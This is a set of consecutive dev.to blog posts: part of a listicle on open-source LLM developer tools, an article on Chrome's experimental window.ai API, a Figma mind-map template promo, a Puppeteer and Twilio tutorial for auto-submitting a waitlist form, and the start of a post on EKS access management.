- Generate document indexes for question-answering.
- Create and attach tools to any agent.

Instruct them in natural language and, for safety, run them inside secure containers (currently implemented with Docker) to perform tasks in their dedicated, sandboxed space. It's built using `Langchain`, `Textual`, and `Chroma`.

Get started with the following command.

```
pip install instrukt[all]
```

![instrukt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r3aza7hnlji7hbi2o0js.gif)

There are a lot of exciting features such as:

✅ A terminal-based interface for power keyboard users to instruct AI agents without ever leaving the keyboard.

✅ Index your data and let agents retrieve it for question-answering. You can create and organize your indexes with an easy UI.

✅ Index creation will auto-detect programming languages and optimize the splitting/chunking strategy accordingly.

✅ Run agents inside secure Docker containers for safety and privacy.

✅ An integrated REPL prompt for quick interaction with agents, and a fast feedback loop for development and testing.

✅ You can automate repetitive tasks with custom commands. It also has a built-in prompt/chat history.

You can read about all the [features](https://github.com/blob42/Instrukt?tab=readme-ov-file#features).

You can read the [installation guide](https://blob42.github.io/Instrukt/install.html).

You can also debug and introspect agents using an in-built IPython console, which is a neat little feature.
![console debugging](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qaan8np68e3fk1yueexm.png)

Instrukt is licensed under the AGPL, meaning that it can be used by anyone for whatever purpose. It is safe to say that Instrukt is an AI commander for your terminal.

It is a new project, so they have around 240 stars on GitHub, but the use case is damn good.

{% cta https://github.com/blob42/Instrukt %} Star Instrukt ⭐️ {% endcta %}

---

## 15. [Quivr](https://github.com/QuivrHQ/quivr) - RAG Framework for building GenAI Second Brains.

![quivr](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oiowtt3ys9shf4iivglq.png)

&nbsp;

Quivr, your second brain, utilizes the power of GenerativeAI to be your personal assistant! You can think of it as Obsidian but turbocharged with AI powers.

Quivr is a platform that enables the creation of AI assistants, referred to as `Brains`. These assistants are designed with specialized capabilities: some can connect to specific data sources, allowing users to interact directly with the data, while others serve as specialized tools for particular use cases, powered by RAG technology. These tools process specific inputs to generate practical outputs, such as summaries, translations, and more.

Watch a quick demo of Quivr!

![quivr gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k7xx3290daebg2pw11i2.gif)

Some of the amazing features are:

✅ You can choose the type of Brain you want to use, based on the data source you wish to interact with.

✅ They also provide a powerful feature to share your brain with others. This can be done by sharing with individuals via their emails and assigning them specific rights.

![sharing brain](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e3mn636j0sl6si5lzpzf.png)

✅ Quivr works offline, so you can access your data anytime, anywhere.

✅ You can access and continue your past conversations with your brains.

✅ But the one I loved best is that you can literally install a Slack bot. Refer to this demo to see what you can do. Very cool!

{% embed https://youtu.be/1yMe21vIl9E %}

Anyway, read about all the [awesome stuff](https://docs.quivr.app/features/brain-creation) that you can do with Quivr.

You can read the [installation guide](https://github.com/QuivrHQ/quivr?tab=readme-ov-file#getting-started-) and the [60 seconds installation video](https://www.youtube.com/watch?v=cXBa6dZJN48). I really loved this idea!

You can read the [docs](https://docs.quivr.app/home/intro).

![stats](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5a27c2ubbmri0b2xlh1l.png)

They have also provided [guides](https://docs.quivr.app/deployment/porter) on how to deploy Quivr with Vercel, Porter, AWS, and Digital Ocean.

They could provide a better free tier plan, but it's more than enough to test things on your end.

It has 30k+ stars on GitHub with 220+ releases, which means they're constantly improving.

{% cta https://github.com/QuivrHQ/quivr %} Star Quivr ⭐️ {% endcta %}

---

## 16. [Open Interpreter](https://github.com/OpenInterpreter/open-interpreter) - natural language interface for terminal.

![Open Interpreter](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/av7udc5fibj1wz88w0u8.png)

&nbsp;

Open Interpreter lets LLMs run code (Python, JavaScript, Shell, and more) locally. You can chat with Open Interpreter through a ChatGPT-like interface in your terminal by running `$ interpreter` after installing.
This provides a natural-language interface to your computer's general-purpose capabilities:

✅ Create and edit photos, videos, PDFs, etc.

✅ Control a Chrome browser to perform research.

✅ Plot, clean, and analyze large datasets.

I don't know about you, but their [website](https://www.openinterpreter.com/) made me say WOW!

Quickstart using this command.

```bash
pip install open-interpreter

# After installation, simply run:
interpreter
```

You can read the [quickstart guide](https://docs.openinterpreter.com/getting-started/introduction).

You should read about the [comparison to ChatGPT's Code Interpreter](https://github.com/OpenInterpreter/open-interpreter?tab=readme-ov-file#comparison-to-chatgpts-code-interpreter) and the [commands](https://github.com/OpenInterpreter/open-interpreter?tab=readme-ov-file#commands) that you can use.

You can read the [docs](https://docs.openinterpreter.com/getting-started/introduction).

Open Interpreter works with both hosted and local language models. Hosted models are faster and more capable but require payment, while local models are private and free but are often less capable. Choose based on your use case!

They have 48k+ stars on GitHub and are used by 300+ developers.

{% cta https://github.com/OpenInterpreter/open-interpreter %} Star Open Interpreter ⭐️ {% endcta %}

---

## 17. [CopilotKit](https://github.com/CopilotKit/CopilotKit) - 10x easier to build AI Copilots.

![copilotKit](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iq3tyn2vi21qmnso1lg7.png)

&nbsp;

You will agree that it's tough to add AI features to a React app; that's where CopilotKit helps you, as a framework for building custom AI copilots. You can build in-app AI chatbots and in-app AI agents with the simple components provided by CopilotKit, which is at least 10x easier than building them from scratch. You shouldn't reinvent the wheel if there is already a very simple and fast solution!

They also provide built-in (fully customizable) Copilot-native UX components like `<CopilotKit />`, `<CopilotPopup />`, `<CopilotSidebar />`, `<CopilotTextarea />`.

![components](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/abbaw6u488uu6xw8y88x.png)

Get started with the following npm command.

```npm
npm i @copilotkit/react-core @copilotkit/react-ui
```

This is how you can integrate a chatbot. A `CopilotKit` must wrap all components which interact with CopilotKit. It’s recommended you also get started with `CopilotSidebar` (you can swap to a different UI provider later).

```javascript
"use client";
import { CopilotKit } from "@copilotkit/react-core";
import { CopilotSidebar } from "@copilotkit/react-ui";
import "@copilotkit/react-ui/styles.css";

export default function RootLayout({children}) {
  return (
    <CopilotKit url="/path_to_copilotkit_endpoint/see_below">
      <CopilotSidebar>
        {children}
      </CopilotSidebar>
    </CopilotKit>
  );
}
```

You can read the [docs](https://docs.copilotkit.ai/getting-started/quickstart-textarea) and check the [demo video](https://github.com/CopilotKit/CopilotKit?tab=readme-ov-file#demo).

You can integrate the Vercel AI SDK, OpenAI APIs, Langchain, and other LLM providers with ease. You can follow this [guide](https://docs.copilotkit.ai/getting-started/quickstart-chatbot) to integrate a chatbot into your application.

The basic idea is to build AI chatbots very fast without a lot of struggle, especially in LLM-based apps.

You can watch the complete walkthrough!

{% embed https://youtu.be/VFXdSQxTTww %}

CopilotKit has recently crossed 7k+ stars on GitHub with 300+ releases.
{% cta https://github.com/CopilotKit/CopilotKit %} Star CopilotKit ⭐️ {% endcta %}

---

## 18. [GPT Engineer](https://github.com/gpt-engineer-org/gpt-engineer) - AI builds what you ask.

![gpt engineer](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8zdpd1ndd7afnt8m4cvz.png)

&nbsp;

GPT Engineer lets you specify software in natural language, sit back, and watch as an AI writes and executes the code, and you can ask the AI to implement improvements.

It's safe to say that it's an engineer who doesn't need a degree 😅

There is also a commercial offshoot for the automatic generation of web apps, which features a UI for non-technical users connected to a git-controlled codebase.

I know this feels confusing, so watch the below demo to understand how you can use GPT Engineer.

![demo gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4lpk4ctcuypzr7ms2pii.gif)

You can get started by installing the stable release using this command.

```
python -m pip install gpt-engineer
```

By default, gpt-engineer expects text input via a prompt file. It can also accept image inputs for vision-capable models. This can be useful for adding UX or architecture diagrams as additional context for GPT Engineer. Read about all the [awesome features](https://github.com/gpt-engineer-org/gpt-engineer?tab=readme-ov-file#features).

If you want a complete walkthrough, watch this awesome demo by David!

{% embed https://www.youtube.com/watch?v=gWy-pJ2ofEM %}

I recommend checking out the [roadmap](https://github.com/gpt-engineer-org/gpt-engineer/blob/main/ROADMAP.md) to understand the overall vision.

![roadmap](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v6vhrqgn8brw8woklvm0.png)

They have 51k+ stars on GitHub and are on the `v0.3` release.

{% cta https://github.com/gpt-engineer-org/gpt-engineer %} Star GPT Engineer ⭐️ {% endcta %}

---

## 19. [Dalai](https://github.com/cocktailpeanut/dalai) - the simplest way to run LLaMA and Alpaca locally.

![dalai](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hthbzdoar9s2li6kepgp.png)

&nbsp;

Dalai lets you run LLaMA and Alpaca on your computer, and is powered by `llama.cpp`, `llama-dl CDN`, and `alpaca.cpp`.

Dalai runs on operating systems such as Linux, macOS, and Windows, so that's a plus point!

![gif demo](https://github.com/cocktailpeanut/dalai/raw/main/docs/alpaca.gif)

Dalai is also an NPM package:

- programmatically install
- locally make requests to the model
- run a dalai server (powered by socket.io)
- programmatically make requests to a remote dalai server (via socket.io)

You can install the package using the below npm command.

```
npm install dalai
```

![latest package](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/27mx3wt2l025oxtzzz6p.png)

You can read the [memory requirements](https://github.com/cocktailpeanut/dalai?tab=readme-ov-file#2-memory-requirements) and how to [use a different folder](https://github.com/cocktailpeanut/dalai?tab=readme-ov-file#using-a-different-home-folder) rather than the default home directory.

They have 13k stars on GitHub and are still in the very early stages.

{% cta https://github.com/cocktailpeanut/dalai %} Star Dalai ⭐️ {% endcta %}

---

## 20. [OpenLLM](https://github.com/bentoml/OpenLLM) - run LLMs as OpenAI compatible API endpoint in the cloud

![open llm](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jf3fjhw0bqxyletw847q.png)

&nbsp;

OpenLLM lets developers run any open-source LLM as an OpenAI-compatible API endpoint with a single command.

⚡ Built for fast and production usage.
⚡ Supports Llama 3, Qwen2, Gemma, etc., and many quantized versions (see the full list).
⚡ OpenAI-compatible API & includes a ChatGPT-like UI.
⚡ Accelerated LLM decoding with state-of-the-art inference backends.
⚡ Ready for enterprise-grade cloud deployment (Kubernetes, Docker, and BentoCloud).

Get started with the following commands.

```
pip install openllm  # or pip3 install openllm
openllm hello
```

OpenLLM provides a chat user interface (UI) at the `/chat` endpoint for an LLM server. You can visit the chat UI at `http://localhost:3000/chat` and start different conversations with the model.

![open llm](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wgbyum3mgy51q46njf0q.png)

OpenLLM supports LLM cloud deployment via BentoML, the unified model serving framework, and BentoCloud, an AI inference platform for enterprise AI teams.

![models](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mdlikmcik2dq746qha3b.png)

If you don't know, BentoCloud provides fully managed infrastructure optimized for LLM inference with autoscaling, model orchestration, observability, and more, allowing you to run any AI model in the cloud.

![bento cloud console](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rmhtm95h90h6z2ei9e8b.png)
<figcaption>Once the deployment is complete, you can run model inference on the BentoCloud console:</figcaption>

You can read about the [supported models](https://github.com/bentoml/OpenLLM?tab=readme-ov-file#supported-models) and how to [start the LLM server](https://github.com/bentoml/OpenLLM?tab=readme-ov-file#start-an-llm-server). As you explore the docs, note that you can also chat with a model in the CLI using `openllm run` and specifying a model version, for example `openllm run llama3:8b`.

For people like me who love exploring walkthroughs, watch this demo by Matthew!

{% embed https://www.youtube.com/watch?v=8nZZ2oQhx4E&pp=ygUIb3BlbiBsbG0%3D %}

They have 9k+ stars on GitHub and 100+ releases, so it's growing at a rapid pace.

{% cta https://github.com/bentoml/OpenLLM %} Star OpenLLM ⭐️ {% endcta %}

---

## 21. [Unsloth](https://github.com/unslothai/unsloth) - Finetune Llama 3, Mistral, Phi & Gemma LLMs 2-5x faster with 80% less memory.

![unsloth](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3eoe4v0miesybe1p9n0e.png)

&nbsp;

Unsloth makes finetuning large language models like Llama-3, Mistral, Phi-3, and Gemma 2x faster, with 70% less memory used, and no degradation in accuracy!

> ✅ What is finetuning?
If we want a language model to learn a new skill, a new language, some new programming language, or simply want the language model to learn how to follow and answer instructions like how ChatGPT functions, we do finetuning!
Finetuning is the process of updating the actual `brains` of the language model through a process called back-propagation. But finetuning can get very slow and very resource-intensive.

&nbsp;

Unsloth can be installed locally or through a GPU service like Google Colab. Most people use Unsloth through Google Colab, which provides a [free GPU](https://github.com/unslothai/unsloth?tab=readme-ov-file#-finetune-for-free) to train with.

![Finetune for Free](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6mnntbvbcho8hmihd59j.png)

Some of the things that stand out:

✅ The open-source version trains 5x faster, and the pro version claims to be 30x faster.
✅ No approximation methods are used, resulting in a 0% loss in accuracy.
✅ No change of hardware needed; works on Linux and Windows via WSL.
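To give you a feel for the API, here's a minimal LoRA finetuning sketch modeled on the examples in the Unsloth README; the model name and hyperparameters below are illustrative, so check the official notebooks for tested configurations:

```python
from unsloth import FastLanguageModel

# Load a 4-bit quantized Llama-3 base model (illustrative model name,
# following Unsloth's pre-quantized uploads on Hugging Face)
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="unsloth/llama-3-8b-bnb-4bit",
    max_seq_length=2048,
    load_in_4bit=True,  # 4-bit quantization to cut memory usage
)

# Attach LoRA adapters so only a small fraction of the weights are trained
model = FastLanguageModel.get_peft_model(
    model,
    r=16,  # LoRA rank; higher means more trainable parameters
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
    lora_alpha=16,
)

# From here, hand `model` and `tokenizer` to a trainer such as trl's
# SFTTrainer with your dataset, as shown in the official notebooks.
```

The speedups and memory savings happen inside these two calls, which is why the rest of the training loop stays the same as a regular Hugging Face finetune.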
![unsloth model stats](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0147naadascce5oztcwf.png)

You can read the [installation instructions](https://github.com/unslothai/unsloth?tab=readme-ov-file#-installation-instructions) and [performance benchmarking tables](https://unsloth.ai/blog/mistral-benchmark#Benchmark%20tables) on the website.

![unsloth](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qm9hb9k6rqt8i1xr3re1.png)

You can read the [docs](https://docs.unsloth.ai/) and browse all the [uploaded models on Hugging Face](https://huggingface.co/unsloth) directly.

They have also provided a detailed guide on [How to Finetune Llama-3 and Export to Ollama](https://docs.unsloth.ai/tutorials/how-to-finetune-llama-3-and-export-to-ollama).

They have 12.5k+ stars on GitHub, and it's an efficient solution.

{% cta https://github.com/unslothai/unsloth %} Star Unsloth ⭐️ {% endcta %}

---

I hope you learned something new!

I believe that learning to use these powerful LLM tools is a choice, and it's on you (as a developer) to find better productivity solutions for your use case.

Have a great day! Till next time.

| If you like this kind of stuff, <br /> please follow me for more :) | <a href="https://twitter.com/Anmol_Codes"><img src="https://img.shields.io/badge/Twitter-d5d5d5?style=for-the-badge&logo=x&logoColor=0A0209" alt="profile of Twitter with username Anmol_Codes" ></a> <a href="https://github.com/Anmol-Baranwal"><img src="https://img.shields.io/badge/github-181717?style=for-the-badge&logo=github&logoColor=white" alt="profile of GitHub with username Anmol-Baranwal" ></a> <a href="https://www.linkedin.com/in/Anmol-Baranwal/"><img src="https://img.shields.io/badge/LinkedIn-0A66C2?style=for-the-badge&logo=linkedin&logoColor=white" alt="profile of LinkedIn with username Anmol-Baranwal" /></a> |
|------------|----------|

Follow Latitude for more content like this.

{% embed https://dev.to/latitude %}
anmolbaranwal
1,916,215
Next-Level Web Applications with On-Device Generative AI: A Look at Google Chrome's Built-In Gemini Nano LLM
Web development is on the brink of a significant transformation with Google Chrome Canary's latest...
0
2024-07-13T18:34:18
https://dev.to/ptvty/next-level-web-applications-with-on-device-generative-ai-a-look-at-google-chromes-built-in-gemini-nano-llm-4bng
webdev, ai, javascript, a11y
Web development is on the brink of a significant transformation with Google Chrome Canary's latest experimental feature, a new tool called the `window.ai` API, allowing websites to harness the power of on-device generative AI. With Google’s Gemini Nano AI model built into the browser, websites can offer smarter, more personalized experiences directly on the user's device. Let's dive into what this means and how you can use it to supercharge your web applications.

## Meet Gemini Nano

Gemini Nano is a compact yet powerful AI model from Google. It is the same model used in some Google Pixel phones for offline AI features. Its small size and impressive capabilities make it perfect for on-device applications, ensuring users benefit from advanced AI without needing to be online.

## What is the `window.ai` API?

Google Chrome Canary consistently introduces exciting new features for developers, and the `window.ai` API is no exception. This API enables your website's JavaScript code to interact directly with Gemini Nano, a model that operates on the user's device. This means all AI tasks are performed locally using the computer’s GPU, ensuring no data is sent over the internet. This approach significantly enhances privacy and allows for offline functionality.

## How to Use the `window.ai` API

Getting started with the `window.ai` API is straightforward. Here’s how you can integrate it into your website:

1. **Install [Google Chrome Canary](https://www.google.com/chrome/canary/)**: Ensure you have the latest version of Google Chrome Canary installed.
2. **Enable the Experimental Feature**: Follow the [instructions](https://github.com/lightning-joyce/chromeai/blob/main/README.md#how-to-set-up-built-in-gemini-nano-in-chrome) to enable the `window.ai` experimental feature.
3. **Check for API Availability**: In your code, verify that `window.ai` is defined to ensure the Local AI API is available in the user’s browser.
4. **Start Sending Prompts**: Once you know the API is available, you can begin sending prompts to Gemini Nano and receive responses using the `ai.createTextSession()` and `session.prompt()` APIs.
5. **Utilize the AI's Response**: Use the AI's response in various ways, such as displaying it to the user, updating your UI, or for more complex processing.

```javascript
if (window.ai) {
  logOceanPoem();
} else {
  console.log("The window.ai API is not available on this browser.");
}

async function logOceanPoem() {
  try {
    const session = await ai.createTextSession({ temperature: 0, topK: 1 });
    const poem = await session.prompt("Write a poem about the ocean.");
    console.log(poem);
  } catch (error) {
    console.error("Error generating text:", error);
  }
}

// => ' In the realm of vast and boundless blue,
//      Where secrets hide and mysteries brew,
//      There lies a realm of ...'
```

## Some Exciting Use Cases

The possibilities with on-device generative AI are endless. Here are a few exciting ways you can use it:

### Privacy-Focused Apps
Use local AI for sensitive applications like health, finance, or where strict data protection policies are required, ensuring complete privacy and data security.

### Offline-First PWAs
Enhance chatbots and virtual assistants with more natural and responsive interactions, even when offline.

### Enhanced User Inputs
Create smart user interfaces by integrating AI into existing form components. For example, a select box can suggest the most relevant options if a user types an invalid option, rather than just displaying "Not found."
```javascript
// The user tries to type in "android developer" in a searchable select box to fill his occupation, not knowing the granularity of the available options
await session.prompt(`which are the 3 closest phrases to "android" from the following phrases:
  1. DevOps Engineer
  2. SEO specialist
  3. Dentist
  4. Cashier
  5. Mobile Developer
  6. Web Developer
  7. Carpenter
  8. Desktop Developer`);
// => ' The three closest phrases to "Android" from the given phrases are: 1. Mobile Developer 2. Web Developer'
```

### Assisted Writing
Enhance text areas with AI writing assistance, allowing text summarization and rephrasing without sending user data to external servers.

```javascript
await session.prompt(`Rephrase this sentence: Facebook suggested your profile, I looked at your profile and I found your story inspiring.`);
// => ' Facebook displayed your profile to me, and upon reviewing it, I found your story to be incredibly inspiring.'
```

### Accessibility and Improved Website Navigation
Create user interfaces that people with disabilities can use more comfortably. For example, a prompt box can intelligently recommend the most relevant actions, pages, sub-menus, and settings based on users' intent. LLMs can easily understand different words that users might use to express the same idea.

```javascript
const choices = ['Like post', 'Save post', 'Share post', 'Block user', 'Follow user'];

await session.prompt(`Which choice is the most relevant to "I do not want to see any posts from this user again!":
  ${choices.map((choice, idx) => `${idx + 1}. ${choice}\n`)}
`)
// => ' The most relevant choice to the command "I do not want to see any posts from this user again!" is **"Block user"**.'
```

```javascript
await session.prompt(`Which choice is the most relevant to "I want to see future posts from this user!":
  ${choices.map((choice, idx) => `${idx + 1}. ${choice}\n`)}
`)
// => ' The most relevant choice is **5: Follow user.**'
```

### Improved Text Search

```javascript
// When a "Find in page" fails to find an exact match, try to search for similar words!
await session.prompt(`Generate 10 words similar to "battery runtime", in the context of "smart phones"`);
// => '1. Battery life 2. Battery endurance 3. Battery longevity 4. Battery capacity 5. Battery duration 6. Battery power 7. Battery energy 8. Battery performance 9. Battery efficiency 10. Battery usage'
```

### Chat With Your Data
Although Gemini Nano is not the best model for factual reasoning, it can handle basic questions. For example, it can allow users to ask questions about the data in a table.

```javascript
await session.prompt(`Who is the tallest person in the following list:
  1. Alice, Weight: 52 kg, Height: 169 cm.
  2. Bob, Weight: 71 kg, Height: 174 cm.
  3. Eve, Weight: 66 kg, Height: 172 cm.
`);
// => 'The tallest person in the list is Bob, who weighs 71 kg and is 174 cm tall.'
```

## Tips for Prompt Engineering

To get the best results from the AI, follow these prompt engineering tips:

- **Play with Parameters**: For factual questions, set the temperature to 0, and set TopK to 1 for more predictable and accurate answers.
- **Use Line Breaks**: Keep related data on the same line to maintain context.
- **Use Parentheses**: Add elaborations and clarifications in parentheses to vague words and phrases.
- **Main Question First**: Put the main question at the beginning of the prompt, followed by related data.
- **Response Parsing**: The model usually uses Markdown to format its response. Use this to your benefit.
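For example, if you're looking for a few keywords but the response is long, just take the bold words (inside double asterisks). Here's a minimal sketch of that parsing trick, assuming `response` already holds the Markdown reply returned by `session.prompt()`:

```javascript
// Pull out every bold phrase (**like this**) from the model's Markdown reply
const boldPhrases = [...response.matchAll(/\*\*(.+?)\*\*/g)].map((m) => m[1]);
console.log(boldPhrases); // e.g. ["Block user"]
```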
## Why On-Device AI is Awesome

- **Privacy and Security**: All data stays on the user's device, enhancing privacy and reducing the risk of data breaches.
- **Offline Functionality**: Apps work seamlessly without an internet connection, providing uninterrupted service.
- **Better Performance**: Using the device's GPU can lead to faster response times and a more responsive application.
- **Cost Savings**: Less reliance on cloud-based services can lower your operational costs.

## Things to Keep in Mind

While the `window.ai` API is fantastic, there are a few things to consider:

- **Device Compatibility**: Currently, this feature is exclusive to Google Chrome Canary. Ensure compatibility with other browsers and devices that may not have a GPU available.
- **Resource Use**: Running AI models can be heavy on resources, especially on lower-end hardware.
- **Model Limits**: On-device models might not be as powerful as their cloud-based counterparts, so balance functionality accordingly.

## Conclusion

The `window.ai` API in Google Chrome Canary introduces a groundbreaking tool that harnesses the capabilities of on-device generative AI for web development. By utilizing local computation, it can enhance privacy, performance, and user experience. While currently an experimental feature, the potential for wider adoption remains uncertain. Nonetheless, exploring its capabilities now can pave the way for developing smarter, more responsive, and secure web applications in the future.
ptvty
1,916,447
Get Creativity Free Figma Mind Map Template
Are you looking for a versatile and user-friendly tool to create mind maps? Look no further! Sarah...
0
2024-07-13T15:43:00
https://neattemplate.com/figma-templates/get-creativity-free-figma-mind-map-template
webdev, figma, ui, uidesign
Are you looking for a versatile and user-friendly tool to create mind maps? Look no further! Sarah Elizabeth has designed a free Figma mind map template that will help you organize your thoughts and ideas effectively. ### Why Use a Mind Map? Mind maps are a powerful visual tool that can enhance your brainstorming sessions, planning processes, and note-taking activities. They allow you to capture and connect ideas in a non-linear way, helping you see the bigger picture and uncover new insights. ![Figma Mind Map Template](https://neattemplate.com/wp-content/uploads/2024/04/Bubble-Map%F0%9F%92%AD-1-1024x743.png) ### Types of Mind Maps Sarah Elizabeth's template includes various types of mind maps to cater to different needs: - Bubble Map: This type of mind map uses bubbles or circles to represent ideas or concepts. It allows you to explore relationships and connections between different elements. - Double Bubble Map: Similar to a bubble map, a double bubble map enables you to compare and contrast two different ideas or concepts side by side. - Circle Map: A circle map is used to define a central idea or concept and brainstorm related ideas or attributes around it. - Tree Map: A tree map is a hierarchical mind map that organizes ideas or concepts in a tree-like structure. It helps you break down complex topics into subtopics and sub-subtopics. Whether you're a student, professional, or creative individual, these mind map templates will serve as a valuable resource in your work or personal projects. [Download](https://www.figma.com/community/file/904971547725159114)
faisalgg
1,916,479
How to Build a Javascript Booking Automation Bot
Introduction I was recently made aware of a waitlist opening up for a new service in my...
0
2024-07-13T20:45:02
https://dev.to/columk1/how-to-build-a-javascript-booking-automation-bot-32em
webdev, javascript, webscraping, automation
### Introduction

I was recently made aware of a waitlist opening up for a new service in my local area. I thought it would be a nice exercise to automate the registration process and secure one of the first places on the list.

#### Registration System

The online form already existed, as it was used to register for a number of different services. The provider announced that there would be a new option added to the form in the coming days. My plan was to watch the site for any changes. As soon as the new checkbox option appeared, my script would fill out the rest of the form with my details, check the new input and submit.

Since the form was loaded with JavaScript, I would use a headless browser to monitor the page for changes using Puppeteer. I also decided to implement an SMS notification system using Twilio. This would notify me if there were any issues submitting the form.

#### Plan

1. Load the target web page in a headless browser.
2. Check if there are more checkboxes on the page than before.
3. If not, repeat steps 1 and 2.
4. If so, open a browser window, fill out and submit the form.
5. Send an SMS notification.

### Let's Begin

#### Step 1. Initialize Local Project

Create a new folder and then navigate to it and run the following commands from the terminal:

```
npm init
npm i puppeteer
touch index.js
```

#### Step 2. Create Browser Instance

Create a headless browser instance using Puppeteer to check the target web page.

```js
import puppeteer from 'puppeteer'

const URL = '<TargetURL>'

const headlessBrowser = await puppeteer.launch({ headless: true })
const headlessPage = await headlessBrowser.newPage()
await headlessPage.goto(URL)
```

Top-level `await` works here as long as the project is an ES module, e.g. with `"type": "module"` in your `package.json`.

#### Step 3. Check for Updates

Develop a function to check the page for the expected condition. There are many different ways to compare pages. I checked if there was a new checkbox on the page using CSS selectors. The function returns true if the number of checkboxes on the page is greater than the number provided as an argument. You could also check the text of the page for diffs or use regex to search for matches.

```js
async function hasAdditionalCheckbox(initialCount) {
  await headlessPage.reload({
    waitUntil: 'load',
  })
  const checkboxCount = await headlessPage.evaluate(() => {
    return document.querySelectorAll("input[type='checkbox']").length
  })
  return checkboxCount > initialCount
}
```

By setting `waitUntil` to "load", we instruct Puppeteer to wait for the load event of the page to be fired before proceeding. This means Puppeteer will ensure that all resources, including scripts, stylesheets, and images, have been fully loaded before moving on to the next line of code where we select form elements.

> If you don't need to access JavaScript-rendered elements it is much easier, as you can simply use Node's native `fetch` method to grab the HTML of a page or to fetch a response from an API. In that case Puppeteer is overkill for this function.

#### Step 4. Create a function to autofill and submit the form.

This will fill out the form using a combination of Puppeteer's page interaction APIs and regular CSS selectors. The `click` and `type` functions are self-explanatory. The `evaluate` function takes a callback which allows you to run JavaScript inside the page.
```js
async function autofillForm() {
  const browser = await puppeteer.launch({ headless: false })
  const page = await browser.newPage()
  await page.goto(URL, {
    waitUntil: 'load',
  })

  await page.type('#date-picker', '22/07/1989')
  await page.click('#radio-button-2')
  await page.type('#name', 'John Doe')
  await page.type('#email', 'johndoe@gmail.com')

  await page.evaluate(() => {
    const checkboxes = document.querySelectorAll('input[type="checkbox"]')
    checkboxes.forEach((checkbox) => {
      const label = checkbox.previousElementSibling
      if (label.innerText.includes('<expectedText>')) {
        checkbox.checked = true
      }
    })
  })

  await page.click('#submit-btn')
}
```

I created a new browser instance using the options argument `headless: false` in this function because I wanted to see the confirmation of my form submission on my screen. It would also have been fine to use the existing headless instance and then parse the result of the form submission in Node.

#### Step 5. Set up SMS notifications with Twilio.

You may want to be notified when your conditional is triggered. In my case, this was to check if the form had been submitted correctly. Another use case would be if your form requires manual completion of a captcha or entry of sensitive billing information.

Go to https://www.twilio.com/ and create a new account. Once you have verified your phone number, go to the console and navigate to the messages section. You should see a heading titled "Send your First SMS" with some code snippets below. Click the Node.js tab and copy the code snippet provided.

> This will include your API keys but it's fine since we'll be running the app locally. If you are hosting your script in a public repo or sharing it you should place these in an environment variable.

In your project directory, run `npm i twilio`

Create a new async function called `sendSMS` and paste in the snippet from Twilio. It should look something like this:

```js
import twilio from 'twilio'

async function sendSMS() {
  const accountSid = process.env.ACCOUNT_SID
  const authToken = process.env.AUTH_TOKEN
  const client = twilio(accountSid, authToken)

  const message = await client.messages.create({
    body: 'Waitlist is open!',
    from: '<yourTwilioPhoneNumber>',
    to: '<yourPhoneNumber>',
  })
}
```

You can also trigger an email or a phone call if preferred.

#### Step 6. Putting it All Together

Now we can put everything in an interval:

```js
const waitlistScraper = setInterval(async () => {
  const isWaitlistOpen = await hasAdditionalCheckbox(3)
  if (isWaitlistOpen) {
    autofillForm()
    sendSMS()
    clearInterval(waitlistScraper)
  }
}, 5000) // 5 seconds
```

And we're done! Use the command `node index.js` when you are ready to run the application. You may need to adjust your machine's sleep settings to ensure that the script stays running. Mac users can use the command `caffeinate` to achieve this.

### Conclusion

This project demonstrates the flexibility of automation through web scraping and browser control. Such techniques can be applied to various scenarios, making it a valuable skill in web development. Whether you're booking tickets, monitoring product availability, or gathering data, these skills can greatly enhance your productivity. Plus, they're fun little projects, especially when they save you from staying up all night refreshing a page!
columk1
1,916,532
AWS: Kubernetes and Access Management API, the new authentication in EKS
Another cool feature that Amazon showed back at the last re:Invent in November 2023 is changes in...
0
2024-07-13T09:48:39
https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/
security, kubernetes, aws, devops
---
title: AWS: Kubernetes and Access Management API, the new authentication in EKS
published: true
date: 2024-07-08 22:17:16 UTC
tags: security,kubernetes,aws,devops
canonical_url: https://rtfm.co.ua/en/aws-kubernetes-and-access-management-api-the-new-authentification-in-eks/
---

![](https://cdn-images-1.medium.com/max/1024/1*JZAYCCIy6Muaxtz2FKpu0w.png)

Another cool feature that Amazon showed back at the last re:Invent in November 2023 is changes in how AWS Elastic Kubernetes Service authenticates and authorizes users. And this applies not only to the cluster’s users, but also to its WorkerNodes.

I mean, it’s not really a new scheme (November 2023) — but I just now got around to upgrading the cluster from 1.28 to 1.30, and at the same time I will update the version of the [`terraform-aws-modules/eks`](https://registry.terraform.io/modules/terraform-aws-modules/eks/aws/latest) with the EKS Access Management API changes, as we are currently on version 19 and the changes were added in version 20 (see [v20.0.0 Release notes](https://github.com/terraform-aws-modules/terraform-aws-eks/releases/tag/v20.0.0)).

We will probably talk about Terraform in the next post, but today let’s see how the new system works and what it allows us to do. And knowing this, we will go to Terraform and think about how to organize work with IAM, considering the changes in the EKS Access Management API and [EKS Pod Identities](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/).

In general, you can still see old posts on authentication/authorization in Kubernetes:

